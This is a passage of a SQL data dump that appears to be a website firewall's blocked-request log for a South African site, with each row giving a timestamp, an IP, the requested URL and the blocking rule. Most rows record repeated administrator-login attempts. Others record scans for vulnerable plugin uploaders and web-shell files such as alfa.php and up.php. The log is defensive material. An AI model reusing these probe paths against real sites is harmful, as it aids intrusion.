11:26:58','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6851,'2022-06-26 14:42:55','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6852,'2022-06-26 14:50:29','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6853,'2022-06-26 15:48:46','13.90.38.225','https://smithandsmith.co.za/wp-admin/includes/','404shield',''),(6854,'2022-06-26 17:06:52','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6855,'2022-06-26 17:35:33','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6856,'2022-06-26 20:03:33','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6857,'2022-06-26 22:35:52','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6858,'2022-06-26 22:47:15','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6859,'2022-06-26 23:11:05','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6860,'2022-06-26 23:51:42','185.220.101.6','http://smithandsmith.co.za/contact/','httpbl',''),(6861,'2022-06-26 23:51:44','185.220.101.6','http://smithandsmith.co.za/','httpbl',''),(6862,'2022-06-26 23:51:51','185.220.100.242','https://smithandsmith.co.za/contact','httpbl',''),(6863,'2022-06-26 23:51:53','185.220.100.242','https://smithandsmith.co.za/','httpbl',''),(6864,'2022-06-27 00:18:06','46.161.27.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(6865,'2022-06-27 00:49:14','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6866,'2022-06-27 01:27:20','151.80.20.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(6867,'2022-06-27 02:31:51','5.161.41.208','https://smithandsmith.co.za/wp-content/index.php','404shield',''),(6868,'2022-06-27 03:20:37','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6869,'2022-06-27 04:18:13','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6870,'2022-06-27 07:25:39','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6871,'2022-06-27 07:30:42','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6872,'2022-06-27 07:53:29','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6873,'2022-06-27 08:03:29','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6874,'2022-06-27 08:50:47','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6875,'2022-06-27 10:25:04','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6876,'2022-06-27 14:32:41','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6877,'2022-06-27 15:17:33','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6878,'2022-06-27 15:28:56','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6879,'2022-06-27 16:00:52','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6880,'2022-06-27 17:44:48','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6881,'2022-06-27 18:59:52','35.198.25.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(6882,'2022-06-27 19:37:21','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/page-flip-image-gallery/upload.php','404shield',''),(6883,'2022-06-27 23:04:48','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6884,'2022-06-28 00:28:35','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6885,'2022-06-28 03:54:56','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6886,'2022-06-28 05:35:41','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6887,'2022-06-28 09:00:18','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6888,'2022-06-28 10:58:08','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6889,'2022-06-28 12:46:44','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6890,'2022-06-28 12:53:32','41.10.1.255','https://smithandsmith.co.za/administrator/index.php?option=com_login&task=logout&ced664dd01aa79d0f1ec2d395b400f0f=1','adminpw',''),(6891,'2022-06-28 13:12:21','1.14.96.192','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(6892,'2022-06-28 13:40:32','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6893,'2022-06-28 17:38:19','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6894,'2022-06-28 18:14:43','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6895,'2022-06-28 19:14:32','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6896,'2022-06-28 20:23:34','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6897,'2022-06-28 23:06:51','194.38.20.161','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=load_ajax_function&file=tf2rghf.jpg','404shield',''),(6898,'2022-06-28 23:33:35','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6899,'2022-06-29 01:19:55','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6900,'2022-06-29 01:30:40','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6901,'2022-06-29 02:07:33','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6902,'2022-06-29 03:34:42','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6903,'2022-06-29 07:56:48','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6904,'2022-06-29 08:36:14','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6905,'2022-06-29 09:20:03','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6906,'2022-06-29 10:39:10','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6907,'2022-06-29 11:28:00','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6908,'2022-06-29 14:38:38','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6909,'2022-06-29 16:14:49','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6910,'2022-06-29 16:32:31','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6911,'2022-06-29 18:50:50','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6912,'2022-06-29 19:08:11','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6913,'2022-06-29 19:33:17','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6914,'2022-06-29 20:59:45','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6915,'2022-06-29 21:49:42','120.79.8.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(6916,'2022-06-30 00:34:14','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6917,'2022-06-30 03:10:35','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6918,'2022-06-30 03:39:31','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6919,'2022-06-30 04:57:52','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6920,'2022-06-30 05:20:06','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6921,'2022-06-30 05:34:52','36.85.221.150','https://smithandsmith.co.za/wp-login.php','404shield',''),(6922,'2022-06-30 07:13:11','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6923,'2022-06-30 08:15:17','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(6924,'2022-06-30 08:50:54','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6925,'2022-06-30 12:12:25','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6926,'2022-06-30 13:01:00','40.83.40.175','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6927,'2022-06-30 13:01:41','40.83.40.175','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6928,'2022-06-30 13:02:01','40.83.40.175','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6929,'2022-06-30 15:02:26','213.136.93.169','https://smithandsmith.co.za/wp-login.php','404shield',''),(6930,'2022-06-30 15:07:27','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6931,'2022-06-30 15:07:27','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6932,'2022-06-30 17:14:48','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6933,'2022-06-30 20:51:27','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6934,'2022-06-30 22:00:58','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6935,'2022-06-30 23:56:48','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6936,'2022-07-01 01:29:11','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6937,'2022-07-01 01:51:45','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6938,'2022-07-01 02:07:19','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6939,'2022-07-01 05:34:57','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6940,'2022-07-01 07:23:27','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6941,'2022-07-01 10:43:24','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6942,'2022-07-01 12:06:43','185.7.145.88','http://smithandsmith.co.za/contact/','httpbl',''),(6943,'2022-07-01 12:06:44','185.7.145.88','http://smithandsmith.co.za/','httpbl',''),(6944,'2022-07-01 12:06:44','185.7.145.88','http://smithandsmith.co.za/','httpbl',''),(6945,'2022-07-01 12:43:34','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6946,'2022-07-01 12:56:37','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6947,'2022-07-01 14:04:11','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6948,'2022-07-01 15:35:27','20.238.44.106','https://smithandsmith.co.za/wp-content/plugins/sid/up.php','404shield',''),(6949,'2022-07-01 15:35:27','20.238.44.106','https://smithandsmith.co.za/wp-content/plugins/ubh/up.php','404shield',''),(6950,'2022-07-01 15:35:28','20.238.44.106','https://smithandsmith.co.za//wp-content/haccess.php?send=ok','404shield',''),(6951,'2022-07-01 16:14:30','83.22.207.193','http://smithandsmith.co.za/administrator/','adminpw',''),(6952,'2022-07-01 16:14:33','83.22.207.193','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6953,'2022-07-01 16:14:34','83.22.207.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(6954,'2022-07-01 16:14:38','185.220.101.44','http://smithandsmith.co.za/administrator/','adminpw',''),(6955,'2022-07-01 16:14:39','185.220.101.44','http://smithandsmith.co.za/','httpbl',''),(6956,'2022-07-01 16:14:39','185.220.101.44','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6957,'2022-07-01 16:14:52','74.82.47.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(6958,'2022-07-01 17:10:10','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css','404shield',''),(6959,'2022-07-01 19:22:33','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6960,'2022-07-01 20:28:19','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6961,'2022-07-01 22:32:57','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6962,'2022-07-01 23:55:09','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6963,'2022-07-02 02:48:46','34.65.151.129','https://smithandsmith.co.za/wp-login.php','404shield',''),(6964,'2022-07-02 03:47:55','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6965,'2022-07-02 04:06:51','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6966,'2022-07-02 07:05:00','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6967,'2022-07-02 08:07:49','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6968,'2022-07-02 08:18:05','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6969,'2022-07-02 08:34:45','116.203.243.214','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(6970,'2022-07-02 08:35:00','116.203.243.214','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6971,'2022-07-02 08:35:02','116.203.243.214','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(6972,'2022-07-02 10:48:59','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6973,'2022-07-02 11:17:50','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6974,'2022-07-02 12:36:00','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6975,'2022-07-02 16:45:28','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6976,'2022-07-02 18:44:58','8.219.122.150','https://smithandsmith.co.za/wp-login.php','404shield',''),(6977,'2022-07-02 18:57:17','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6978,'2022-07-02 19:32:23','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6979,'2022-07-02 20:20:06','159.203.108.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(6980,'2022-07-02 21:40:48','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6981,'2022-07-03 02:12:30','20.113.91.89','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(6982,'2022-07-03 02:12:33','20.113.91.89','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(6983,'2022-07-03 02:12:37','20.113.91.89','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(6984,'2022-07-03 02:26:57','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6985,'2022-07-03 02:42:18','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(6986,'2022-07-03 03:39:34','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6987,'2022-07-03 05:40:06','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6988,'2022-07-03 06:23:21','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6989,'2022-07-03 07:01:50','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6990,'2022-07-03 07:20:54','20.248.243.89','https://smithandsmith.co.za/wp-admin.php','404shield',''),(6991,'2022-07-03 08:18:05','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6992,'2022-07-03 08:38:32','51.141.34.3','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(6993,'2022-07-03 08:38:32','51.141.34.3','https://www.smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(6994,'2022-07-03 08:38:33','51.141.34.3','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(6995,'2022-07-03 09:42:52','177.223.50.229','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6996,'2022-07-03 10:14:39','212.237.122.123','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(6997,'2022-07-03 11:34:58','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6998,'2022-07-03 13:33:25','78.47.240.140','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(6999,'2022-07-03 13:33:26','78.47.240.140','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7000,'2022-07-03 13:33:26','78.47.240.140','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7001,'2022-07-03 15:27:17','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7002,'2022-07-03 16:33:43','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7003,'2022-07-03 16:50:33','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7004,'2022-07-03 17:23:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7005,'2022-07-03 17:25:21','92.119.156.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(7006,'2022-07-03 19:53:32','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7007,'2022-07-03 22:32:00','20.45.181.14','https://www.smithandsmith.co.za/wp-content/uploads/2021/12/up.php','404shield',''),(7008,'2022-07-03 22:32:01','20.45.181.14','https://www.smithandsmith.co.za/wp-content/ALFA_DATA/alfacgiapi/','404shield',''),(7009,'2022-07-03 22:32:05','20.45.181.14','https://www.smithandsmith.co.za/wp-admin/alfa.php','404shield',''),(7010,'2022-07-04 00:01:14','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7011,'2022-07-04 00:34:01','78.47.240.140','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7012,'2022-07-04 00:34:02','78.47.240.140','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7013,'2022-07-04 00:34:02','78.47.240.140','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7014,'2022-07-04 01:18:28','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7015,'2022-07-04 01:26:05','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7016,'2022-07-04 01:29:49','193.201.9.12','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=1','404shield',''),(7017,'2022-07-04 02:16:36','45.227.255.38','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7018,'2022-07-04 03:13:52','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7019,'2022-07-04 03:45:29','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7020,'2022-07-04 04:14:10','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7021,'2022-07-04 06:17:40','20.205.234.193','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7022,'2022-07-04 06:17:51','20.205.234.193','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7023,'2022-07-04 06:17:54','20.205.234.193','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7024,'2022-07-04 08:33:11','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7025,'2022-07-04 08:41:16','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7026,'2022-07-04 09:53:05','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7027,'2022-07-04 11:13:24','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/uploadify/readme.txt','404shield',''),(7028,'2022-07-04 11:37:34','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7029,'2022-07-04 13:57:12','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7030,'2022-07-04 15:11:45','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7031,'2022-07-04 16:15:05','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7032,'2022-07-04 17:05:27','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7033,'2022-07-04 18:24:20','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7034,'2022-07-04 19:52:07','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7035,'2022-07-05 00:38:35','13.89.62.173','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7036,'2022-07-05 00:38:58','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7037,'2022-07-05 00:57:31','52.13.19.175','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7038,'2022-07-05 00:57:33','52.13.19.175','https://www.smithandsmith.co.za/wp-content/plugins/wp-diambar/includes/loadme.php','404shield',''),(7039,'2022-07-05 00:57:34','52.13.19.175','https://www.smithandsmith.co.za/wp-content/plugins/zaen/includes/loadme.php','404shield',''),(7040,'2022-07-05 01:36:00','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7041,'2022-07-05 02:04:33','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7042,'2022-07-05 02:50:04','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7043,'2022-07-05 03:53:08','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7044,'2022-07-05 05:25:04','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7045,'2022-07-05 08:01:09','154.92.15.129','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7046,'2022-07-05 10:09:54','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7047,'2022-07-05 10:42:56','148.72.214.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(7048,'2022-07-05 11:19:48','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7049,'2022-07-05 11:30:02','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7050,'2022-07-05 11:45:59','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7051,'2022-07-05 12:57:15','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7052,'2022-07-05 16:08:46','174.138.27.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(7053,'2022-07-05 16:17:28','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7054,'2022-07-05 17:19:11','54.37.155.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(7055,'2022-07-05 18:47:43','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7056,'2022-07-05 20:02:49','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7057,'2022-07-05 20:27:20','20.89.17.46','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7058,'2022-07-05 20:27:21','20.89.17.46','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7059,'2022-07-05 20:27:22','20.89.17.46','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7060,'2022-07-05 21:20:51','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7061,'2022-07-05 22:02:57','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7062,'2022-07-05 23:57:49','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7063,'2022-07-06 00:15:10','20.89.17.46','http://www.smithandsmith.co.za/','muashield',''),(7064,'2022-07-06 00:15:11','20.89.17.46','http://www.smithandsmith.co.za/','muashield',''),(7065,'2022-07-06 00:15:14','20.89.17.46','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(7066,'2022-07-06 01:30:52','20.55.26.141','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(7067,'2022-07-06 01:42:25','20.55.26.141','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7068,'2022-07-06 02:10:42','20.55.26.141','https://smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7069,'2022-07-06 02:21:46','20.55.26.141','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(7070,'2022-07-06 02:25:05','35.225.163.183','http://smithandsmith.co.za/','httpbl',''),(7071,'2022-07-06 02:39:24','20.55.26.141','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7072,'2022-07-06 02:40:51','20.55.26.141','https://smithandsmith.co.za/wp-content/mu-plugins/db-safe-mode.php','404shield',''),(7073,'2022-07-06 02:43:33','20.55.26.141','https://smithandsmith.co.za/wp-content/themes/config.bak.php','404shield',''),(7074,'2022-07-06 02:57:42','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7075,'2022-07-06 03:08:16','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7076,'2022-07-06 03:47:07','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7077,'2022-07-06 04:04:56','168.63.241.68','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7078,'2022-07-06 04:05:18','168.63.241.68','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7079,'2022-07-06 04:05:31','168.63.241.68','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7080,'2022-07-06 04:16:13','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/uploadify/includes/check.php','404shield',''),(7081,'2022-07-06 05:52:36','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7082,'2022-07-06 08:47:01','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7083,'2022-07-06 10:38:14','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7084,'2022-07-06 10:58:09','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7085,'2022-07-06 11:43:19','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7086,'2022-07-06 13:28:03','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7087,'2022-07-06 13:53:07','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7088,'2022-07-06 18:19:49','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7089,'2022-07-06 19:31:41','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7090,'2022-07-06 19:58:54','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7091,'2022-07-06 20:05:46','20.236.29.2','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7092,'2022-07-06 20:05:48','20.236.29.2','https://www.smithandsmith.co.za/wp-content/plugins/wp-diambar/includes/loadme.php','404shield',''),(7093,'2022-07-06 20:05:48','20.236.29.2','https://www.smithandsmith.co.za/wp-content/plugins/zaen/includes/loadme.php','404shield',''),(7094,'2022-07-06 20:55:38','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7095,'2022-07-06 21:57:24','103.93.17.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(7096,'2022-07-06 21:57:26','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7097,'2022-07-07 00:14:48','3.123.37.14','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7098,'2022-07-07 00:37:42','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7099,'2022-07-07 02:02:46','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7100,'2022-07-07 03:48:42','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7101,'2022-07-07 06:12:49','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7102,'2022-07-07 07:08:21','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/CCSlider/includes/upload.php','404shield',''),(7103,'2022-07-07 08:52:53','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7104,'2022-07-07 09:47:56','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7105,'2022-07-07 11:19:10','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7106,'2022-07-07 11:44:15','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7107,'2022-07-07 11:45:18','20.236.29.2','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7108,'2022-07-07 11:45:20','20.236.29.2','https://www.smithandsmith.co.za/wp-content/plugins/wp-diambar/includes/loadme.php','404shield',''),(7109,'2022-07-07 11:45:20','20.236.29.2','https://www.smithandsmith.co.za/wp-content/plugins/zaen/includes/loadme.php','404shield',''),(7110,'2022-07-07 14:24:20','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7111,'2022-07-07 15:30:36','20.235.4.183','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7112,'2022-07-07 16:24:18','149.129.181.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(7113,'2022-07-07 16:59:37','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7114,'2022-07-07 17:24:03','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7115,'2022-07-07 19:54:15','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7116,'2022-07-07 20:09:32','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7117,'2022-07-07 